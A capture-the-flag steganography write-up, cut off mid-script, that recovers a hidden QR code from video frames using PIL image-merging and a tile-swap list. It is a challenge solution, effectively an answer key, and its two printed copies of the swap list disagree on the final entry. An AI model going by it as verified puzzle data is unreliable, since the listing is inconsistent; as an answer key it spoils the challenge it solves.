&lt;p&gt;Bingo! We are on the right way! The author told us to check the last images! Yeah we will but let’s check what we got in all the images!&lt;/p&gt;
&lt;p&gt;We found a big number of image that have a black line in random position of the image!&lt;/p&gt;
&lt;p float=&#34;left&#34;&gt;
  &lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/015.png&#34; width=&#34;450&#34; style=&#34;margin-right:50px;&#34; /&gt;
  &lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/210.png&#34; width=&#34;450&#34; /&gt; 
&lt;/p&gt;
&lt;p&gt;Ok Let’s focus on the last images as the author said. This is will be better for us. Wait what?! We found a 2 pastebin links and 2 images putted as hint for us. And of couse a rabbit hole(Fake Flag)&lt;/p&gt;
&lt;p float=&#34;center&#34;&gt;
  &lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/372.png&#34; width=&#34;320&#34;style=&#34;margin-right:10px;&#34; /&gt;
  &lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/377.png&#34; width=&#34;320&#34;style=&#34;margin-right:10px;&#34; /&gt; 
  &lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/381.png&#34; width=&#34;320&#34;style=&#34;margin-right:10px;&#34; /&gt; 
&lt;/p&gt;
&lt;p&gt;Let’s check the content of the 2 pastebin links and see what we have!&lt;/p&gt;
&lt;figure class=&#34;highlight txt&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Advertising flash, it&amp;#x27;s time to relax and rest.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;This pastebin is the solution to your problem &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Those links will Absolutely help you &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://4n6nk8s.tech&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://anas-cherni.me/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://ironbyte.me/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://yassine-belkhadem.tech/ ( Don&amp;#x27;t waste your time with this link)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://github.com/M0ngi&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://soter14.tech/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Thi is the FLAG: GG_Tr0ll1ng_1s_MY_G4mE_!&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://github.com/Mohamed-Rafraf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://github.com/adamlahbib&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/mohamed-rafraf/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/adamlahbib/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/anascherni/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/yassine-belkhadem-396266204/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/m0ngi/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/mohamed-ali-ouachani-00a452237/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/rania-midaoui-b0163a1bb/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/mohamed-ayadi-5a10621a4/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;https://www.linkedin.com/in/yassine-belarbi-853303208/&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;There is another fake flag &amp;amp; links for the blogs of the author and his team members! Yeah It’s SOter14 team. Let’s Check the other one. Maybe it will help&lt;/p&gt;
&lt;figure class=&#34;highlight txt&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;6 &amp;lt;--&amp;gt; 29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15 &amp;lt;--&amp;gt; 25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11 &amp;lt;--&amp;gt; 34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10 &amp;lt;--&amp;gt; 24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;1 &amp;lt;--&amp;gt; 23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14 &amp;lt;--&amp;gt; 35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2 &amp;lt;--&amp;gt; 19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17 &amp;lt;--&amp;gt; 33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3 &amp;lt;--&amp;gt; 32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8 &amp;lt;--&amp;gt; 27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13 &amp;lt;--&amp;gt; 31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0 &amp;lt;--&amp;gt; 18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7 &amp;lt;--&amp;gt; 20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5 &amp;lt;--&amp;gt; 28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12 &amp;lt;--&amp;gt; 30&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Absolutely this thing will help but we still didn’t know how this text file will help us! Let’s understand the explanation putted on the other frames.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/377.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The author told us that he split the image to many slices and put each slice in an empty unique image!!! We get it! The random lines are tiny pieces of unique image!&lt;/p&gt;
&lt;p&gt;But how can we collect this slice and re-order them to get the original? The lines are ordered randomly? Let’s think.&lt;/p&gt;
&lt;h3 id=&#34;collect-the-pieces-and-recover-the-orginal-image&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#collect-the-pieces-and-recover-the-orginal-image&#34;&gt;#&lt;/a&gt; collect the pieces and recover the orginal image&lt;/h3&gt;
&lt;p&gt;The solution is simple. That’s assume that the white color have a  &lt;code&gt;0 value&lt;/code&gt;  and the black color have  &lt;code&gt;1 value&lt;/code&gt; . We can sum the pixels of all the images with this concept to recover the image, right?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We know that our image size is 720x720 (The resolution of our video) and from our extracted images we know that we have 360 images that splitted to slices. which mean that every line present 2px (width) from the original image.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Take a look at this script then!&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; PIL &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; Image&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;img=Image.new(&lt;span class=&#34;string&#34;&gt;&amp;#x27;1&amp;#x27;&lt;/span&gt;,(&lt;span class=&#34;number&#34;&gt;720&lt;/span&gt;,&lt;span class=&#34;number&#34;&gt;720&lt;/span&gt;),&lt;span class=&#34;number&#34;&gt;255&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;imgpixs=img.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; n &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;,&lt;span class=&#34;number&#34;&gt;360&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    name=&lt;span class=&#34;string&#34;&gt;&amp;quot;0&amp;quot;&lt;/span&gt;*(&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;-&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;(n+&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)))+&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;(n+&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)+&lt;span class=&#34;string&#34;&gt;&amp;quot;.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    image=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;data/&amp;quot;&lt;/span&gt;+name)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    image_pixs=image.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;Image Number : &amp;quot;&lt;/span&gt;,n)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;720&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;720&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; image_pixs[i,j]!=&lt;span class=&#34;number&#34;&gt;255&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                imgpixs[i,j]=image_pixs[i,j]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;img.save(&lt;span class=&#34;string&#34;&gt;&amp;quot;Recovered.png&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In this script we collect all the black pixels and ignore the white pixels. Because we generate a white image and we will fill it with the black color. Let’s recover the image now!!&lt;/p&gt;
&lt;p&gt;Bingo! There is a progress, we got this image!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/recoverd.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Oh god! It’s a broken QR code. How can we deal with this thing. Oh yeah! We have another clue! The author left this hint for us!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/381.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Oh cool! The author split the QRCode to small square and shuffle them in random order! We need to recover them. The squares are numeroted from 0 to n-1 pieces. This order will help us. Now We get the utility of the pastebin link!&lt;/p&gt;
&lt;figure class=&#34;highlight txt&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;6 &amp;lt;--&amp;gt; 29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15 &amp;lt;--&amp;gt; 25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11 &amp;lt;--&amp;gt; 34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10 &amp;lt;--&amp;gt; 24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;1 &amp;lt;--&amp;gt; 23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14 &amp;lt;--&amp;gt; 35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2 &amp;lt;--&amp;gt; 19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17 &amp;lt;--&amp;gt; 33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3 &amp;lt;--&amp;gt; 32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8 &amp;lt;--&amp;gt; 27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13 &amp;lt;--&amp;gt; 31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0 &amp;lt;--&amp;gt; 18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7 &amp;lt;--&amp;gt; 20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5 &amp;lt;--&amp;gt; 28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12 &amp;lt;--&amp;gt; 3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This is will help us how re-order the QRCode. Let’s take a deep look now the the broken QRCode!.&lt;/p&gt;
&lt;p&gt;The QRCode is splitted by 6 in width and 6 in height. So each piece’s size is 120x120. And we have 36 pieces. It’s impossible to recover the image without the help of pastebin link. Let’s take this line for example  &lt;code&gt;0 &amp;lt;--&amp;gt; 18&lt;/code&gt; , this link told us that the author switch the 1st piece with the 19th piece. (We Start counting from 0 due to the explanation). So we need to write a script that can order this QRCode! We need to recover it!&lt;/p&gt;
&lt;p&gt;Let’s put the content of the pastebin inside a textfile named  &lt;code&gt;help.txt&lt;/code&gt;  and start write our solver.&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; PIL &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; Image&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;W_SPLIT=&lt;span class=&#34;number&#34;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;H_SPLIT=&lt;span class=&#34;number&#34;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ASSEMBLED_IMAGE=&lt;span class=&#34;string&#34;&gt;&amp;quot;Assembled.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SPLITTED_IMAGE=&lt;span class=&#34;string&#34;&gt;&amp;quot;Recovered.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image= Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(SPLITTED_IMAGE)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;width, height = image.size&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pixels = image.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;def&lt;/span&gt; &lt;span class=&#34;title function_&#34;&gt;change_chunk&lt;/span&gt;(&lt;span class=&#34;params&#34;&gt;index1,index2&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos1=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos1.append(index1 % W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos1.append(index1 // W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos2=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos2.append(index2 % W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos2.append(index2 // W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    height_chunk=height // H_SPLIT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    width_chunk= width // W_SPLIT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt; (width_chunk):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt; (height_chunk):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            aux= pixels[pos1[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos1[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            pixels[pos1[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos1[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]= pixels[pos2[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos2[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            pixels[pos2[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos2[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]= aux&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;data=&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;help.txt&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;r&amp;quot;&lt;/span&gt;).read().split(&lt;span class=&#34;string&#34;&gt;&amp;quot;\n&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(data)-&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    position=data[i].split(&lt;span 